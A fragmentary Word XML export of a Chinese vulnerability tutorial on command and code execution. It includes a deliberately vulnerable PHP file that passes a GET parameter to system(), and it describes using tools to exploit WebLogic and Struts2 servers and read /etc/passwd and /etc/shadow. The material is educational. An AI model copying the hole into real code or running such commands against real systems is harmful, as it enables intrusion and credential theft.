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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x00  介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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命令执行漏洞概念：当应用需要调用一些外部程序去处理内容的情况下，就会用到一些执行系统命令的函数。如PHP中的system，exec，shell_exec等，当用户可以控制命令执行函数中的参数时，将可注入恶意系统命令到正常命令中，造成命令执行攻击。</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漏洞成因：脚本语言优点是简洁，方便，但也伴随着一些问题，如速度慢，无法解除系统底层，如果我们开发的应用需要一些除去web的特殊功能时，就需要调用一些外部程序。</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敲黑板！敲黑板！敲黑板！</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提到命令执行漏洞，大家难免会想到代码执行漏洞，两者确实很像，没有太大的区别，提交漏洞时可能没有分的那么详细，不过我们在学习时还是要学会区分不同的概念。</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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>命令执行漏洞：直接调用操作系统命令</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命令执行漏洞的原理：在操作系统中，“&amp;、|、||”都可以作为命令连接符使用，用户通过浏览器提交执行命令，由于服务器端没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令</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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>代码执行漏洞：靠执行脚本代码调用操作系统命令</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代码执行漏洞的原理：应用有时需要调用一些执行系统命令的函数，如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等，当用户能控制这些函数中的参数时，就可以将恶意系统命令拼接到正常命令中，从而造成命令执行攻击，这就是命令执行漏洞。</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这里先给大家看一下两种漏洞的区别</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命令执行长这样：</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="3411220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="图片 42" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSmscqs7lEZQ5CFxFY2XLKsCL95dNON2OBsnNQaGJSRytdg17SGGXv1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png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSmscqs7lEZQ5CFxFY2XLKsCL95dNON2OBsnNQaGJSRytdg17SGGXv1A/640?wx_fmt=png&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8540" cy="3411220"/>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代码执行长这样：</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="2425065"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41" name="图片 41" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSDkJtcYRSc4OEWCfWJ6I3P4qhBxLPCjjibbmjkapvs7RWmuGWeC58n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png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSDkJtcYRSc4OEWCfWJ6I3P4qhBxLPCjjibbmjkapvs7RWmuGWeC58nBg/640?wx_fmt=png&amp;wxfrom=5&amp;wx_laz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8540" cy="2425065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x01  搭建环境</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使用phpstudy搭建环境，新建一个test.php文件，其中输入代码：</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    $arg = $_GET['cmd'];</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    if ($arg) {</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lastRenderedPageBreak/>
        <w:t>        system("$arg");</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    }</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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3267710" cy="1860550"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6350"/>
            <wp:docPr id="38" name="图片 38" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSzuRhQ52wdKAquWibpW6tna9pW2eOVyiaC7iceZBLNNf6ibu9ASP044zKz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png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSzuRhQ52wdKAquWibpW6tna9pW2eOVyiaC7iceZBLNNf6ibu9ASP044zKzQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_laz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860550"/>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在浏览器中访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="858520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="图片 37" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSatHksticcdmO6GvcHibBmMHh3Duvfdo1iaDGb9F1ydcYArqDNeq9pMdx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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSatHksticcdmO6GvcHibBmMHh3Duvfdo1iaDGb9F1ydcYArqDNeq9pMdxQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_laz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540" cy="858520"/>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我们没有加任何东西，当然会报错啦</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接下来我们给它加上参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="962025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="36" name="图片 36" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSYSYaT2lZrODll5CjRon3KAgM7R3Iia5aRlNPn9Z5JXmCeeeK5bUbov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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSYSYaT2lZrODll5CjRon3KAgM7R3Iia5aRlNPn9Z5JXmCeeeK5bUbovA/640?wx_fmt=png&amp;wxfrom=5&amp;wx_laz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8540" cy="96202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这样的操作就是相当于我们在命令行（cmd）下进行ipconfig的查询</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="35" name="图片 35" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaS73JPyRs6zIlQtpec3sZmBnRvMKCVv7Via69L4gXVUylVnPbuIpmtMI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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaS73JPyRs6zIlQtpec3sZmBnRvMKCVv7Via69L4gXVUylVnPbuIpmtMIQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="318071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同样我们来做一个代码执行的页面</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新建hetian.php,输入代码</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3235960" cy="1184910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="34" name="图片 34" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaStWfgoXKafIicwm6lmIaUpWxSqgZbPk5DOIyDianZtYibFyAMibtC4uK0P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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaStWfgoXKafIicwm6lmIaUpWxSqgZbPk5DOIyDianZtYibFyAMibtC4uK0Pg/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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5960" cy="1184910"/>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在浏览器中打开</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="691515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33" name="图片 33" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSRvJCfVqsS7sYWwhXsfwg3HIkDUM9YzLl8UZeyGFIp0yz2xD2rBQTT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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSRvJCfVqsS7sYWwhXsfwg3HIkDUM9YzLl8UZeyGFIp0yz2xD2rBQTTw/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="69151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接下来我们加入自己的参数，在挖掘漏洞时我们最常见的就是使用phpinfo()</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="3117215"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="32" name="图片 32" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSUpZI0swVlno6fPg5G1Pq5HTW0FeZn8gibmRyujo7Hv0Sn2ZHAN3SO7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_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSUpZI0swVlno6fPg5G1Pq5HTW0FeZn8gibmRyujo7Hv0Sn2ZHAN3SO7A/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="311721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我们这里也使用phpinfo();</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这样执行的效果和我们直接去phpinfo.php查看是一样的</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="3124835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="图片 31" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSibeSgLZbFAuYS9s0crhPLGmHNzMlhBia3zPbayiarRsCEFol7AHiaaMmZ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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSibeSgLZbFAuYS9s0crhPLGmHNzMlhBia3zPbayiarRsCEFol7AHiaaMmZw/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="312483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 </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以上给出的例子就是最简单的命令执行/代码执行的雏形，接下来我们看看实际在进行漏洞挖掘的过程中我们会碰到哪些花样姿势。</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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x02  挖掘漏洞</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注：下文的提到的漏洞均已获授权进行测试，并交由厂商修复。</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这些年挖漏洞的白帽子们都躲不开一个词“序列化”，何为序列化？</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以下是来自wiki的描述(</w:t>
      </w:r>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F9CEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://en.wikipedia.org/wiki/Serialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="2584450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="28" name="图片 28" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSZGEju5CjqU5Kg9A7sibaFZpMUv65oryr25xcOSNG8MmmnrEWXOa9G2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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSZGEju5CjqU5Kg9A7sibaFZpMUv65oryr25xcOSNG8MmmnrEWXOa9G2w/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="2584450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>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看English好像难为小伙伴们了，这里直接给大家两个资源吧，小伙伴们去实验一遍就知道了~~</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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Java反序列化漏洞产生的原因在于：</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java编写的web应用与web服务器间java通常会发送大量的序列化对象例如以下场景：HTTP请求中的参数，cookies以及Parameters。RMI协议，被广泛使用的RMI协议完全基于序列化。JMX 同样用于处理序列化对象。自定义协议 用来接收与发送原始的java对象。在序列化过程中会使用ObjectOutputStream类的writeObject()方法，在接收数据后一般又会采用ObjectInputStream类的readObject()方法进行反序列化读取数据</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color w:val="F96E57"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>合天网安实验室Java反序列化漏洞实验主页：</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i/>
          <w:iCs/>
          <w:color w:val="5F9CEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://www.hetianlab.com/expc.do?ce=58830dcd-d0e1-4ff2-baaf-ac396b687b79</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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PHP反序列化漏洞产生的原因在于：</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在php中，序列化过程中会涉及两个魔术方法，__sleep()和__wakeup()，serialize() 检查类中是否有魔术名称 __sleep 的函数，如果有，则该函数在序列化之前运行，它可以清除对象并应该返回一个包含有该对象中应被序列化的所有变量名的数组。如果该函数没有返回什么数据，则不会有什么数据被序列化，并且会发出一个 E_NOTICE 错误。unserialize()检查具有魔术名称 __wakeup 的方法的存在，如果有，一样先运行该方法。但对于传入的序列化字符串，如果有错误，在进行反序列化的时候就会不触发 __wakeup() 这个方法，从而绕过该方法中的限制，造成漏洞。</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color w:val="F96E57"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>合天网安实验室PHP反序列漏洞实验主页：</w:t>
      </w:r>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F9CEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://www.hetianlab.com/expc.do?ce=b8cb1c08-5330-4766-a44e-89dd54cae1d1</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抛开具体涉及到语言、函数，我们用通俗易懂的话的说，序列化就是从A-》B的过程，这是不会出问题的，有可能出问题的地方出在B-》A，在这个过程中伟大的代码审计牛人们发现了漏洞，使得B+N-》C，而不是B-》A，由此引发了漏洞，这种漏洞被称作反序列化漏洞。</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那么用专业些的话来说，是什么意思呢？我们需要在进行反序列化的地方传入攻击者的序列化代码，以此来利用漏洞</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流行的语言如PHP、Java都存在反序列化漏洞，由这些语言开发的知名的组件ImageMagick、Weblogic、Struts2等当然不可避免地会存在反序列化漏洞，本文要展现的第一枚漏洞就是java反序列化漏洞引发的。</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我们说的理论好像很高深似的，其实挖洞的时候大多数人都是直接上工具的，像用burp挖通用型漏洞，bugscan、pocsuite挖事件型漏洞都是很常见的套路。But，由于java的反序列化问题实在太严重，看不下去的师傅们就写了各种各样的工具方便管理员检测自己的漏洞（也方便了白帽子挖洞）。这里展示的几个漏洞就是用工具挖出来的。</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首先我们找到网站的后台：</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="2989580"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="27" name="图片 27" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSJ2DPQXXiaGD5A6jI2THDZhlSia9hmLtsFZV87AJwH2C1fUSk1VPKicbC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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSJ2DPQXXiaGD5A6jI2THDZhlSia9hmLtsFZV87AJwH2C1fUSk1VPKicbCw/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="2989580"/>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                                             </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那段时间weblogic的反序列化漏洞很火，直接上工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="2273935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="图片 26" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSia8UibjRl01O4GQ2DrVwicDlFTLu5sb1nUTGGh2Kq1iaceg7cUQPM7Mru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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSia8UibjRl01O4GQ2DrVwicDlFTLu5sb1nUTGGh2Kq1iaceg7cUQPM7MruQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="227393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发现还真存在这个漏洞，上图我们执行了whoami</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我们可以再看看别的命令</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比如ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="5637530"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="25" name="图片 25" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaS9pSuXfDwHtfvJjAg7mJic6RWwbqiaywZSy8puPvmNsNdPJYB0N2OzmK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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaS9pSuXfDwHtfvJjAg7mJic6RWwbqiaywZSy8puPvmNsNdPJYB0N2OzmKw/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="5637530"/>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上面介绍了weblogic的，我们再来看一个struts2的漏洞</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首先找到web页面</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="3068955"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="图片 24" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSu8PicnRib09srAZPRTSFa6XMn1lN54r6WE6blenvJSVBedQgIYEfRWs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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSu8PicnRib09srAZPRTSFa6XMn1lN54r6WE6blenvJSVBedQgIYEfRWsg/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="306895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用工具K8测试了下发现存在漏洞</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5279390" cy="1987550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="图片 23" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSj8Jg9dQZqVHia01nQvktoduYHNLJOMu0QoFZNjRQPiaU4WyOwgG1xWia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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSj8Jg9dQZqVHia01nQvktoduYHNLJOMu0QoFZNjRQPiaU4WyOwgG1xWiaA/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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9390" cy="1987550"/>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Whoami查看权限发现是root</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5279390" cy="1598295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="22" name="图片 22" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSlmOoS1Iq414ej5Vl51YTndrZazvSXK4OfVtL70UyWIIWgcLw7Gvoy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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSlmOoS1Iq414ej5Vl51YTndrZazvSXK4OfVtL70UyWIIWgcLw7GvoyQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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9390" cy="159829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再用netstat –an查看下端口等信息</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="4341495"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="21" name="图片 21" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSL475Wia2f3a9o9mrUL6UkQuzXDoy7TNeUIDFvkeNrDJLDsgCpWCqDT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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSL475Wia2f3a9o9mrUL6UkQuzXDoy7TNeUIDFvkeNrDJLDsgCpWCqDTg/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="434149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Ifconfig看看网络设备</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="4325620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSvzkeXqcUb7qXQ4goKj14FfAzfyh8ibawGpaWdX0FAIwTZt4hcLRTkU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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSvzkeXqcUb7qXQ4goKj14FfAzfyh8ibawGpaWdX0FAIwTZt4hcLRTkUQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="4325620"/>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都任意执行命令了，不看看帐号管理两个最重要的档案？</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先/passwd看看用户口令</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="4301490"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="19" name="图片 19" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSEqI5oKbW03Awk9r8xV6NVdz9ct8hApicDKBerxyn02wKt6jznicewrz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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSEqI5oKbW03Awk9r8xV6NVdz9ct8hApicDKBerxyn02wKt6jznicewrzQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="4301490"/>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再/shadow看看所有用户的密码</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="4373245"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="18" name="图片 18" descr="http://mmbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSbicXMjVMc0ib4ib0f7smibeJOejnrAdCL1XoicEDmLDkPawwbxdKMybab4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mbiz.qpic.cn/mmbiz_png/3RhuVysG9LcWczgANzrrolcGqxRVUNiaSbicXMjVMc0ib4ib0f7smibeJOejnrAdCL1XoicEDmLDkPawwbxdKMybab4g/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=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8540" cy="437324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以上介绍了两个Java命令执行的漏洞，我们再来介绍个php反序列化导致命令执行的漏洞，这个漏洞存在于joomla中。这个漏洞准确的说并不是命令执行的功劳，不过它是通过php反序列化的命令执行漏洞才进行更深一步的渗透的，所以我还是在这里列了出来。</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碰到一个joomla的网站</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765925" w:rsidRPr="00765925" w:rsidRDefault="00765925" w:rsidP="00765925">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6098540" cy="2751455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
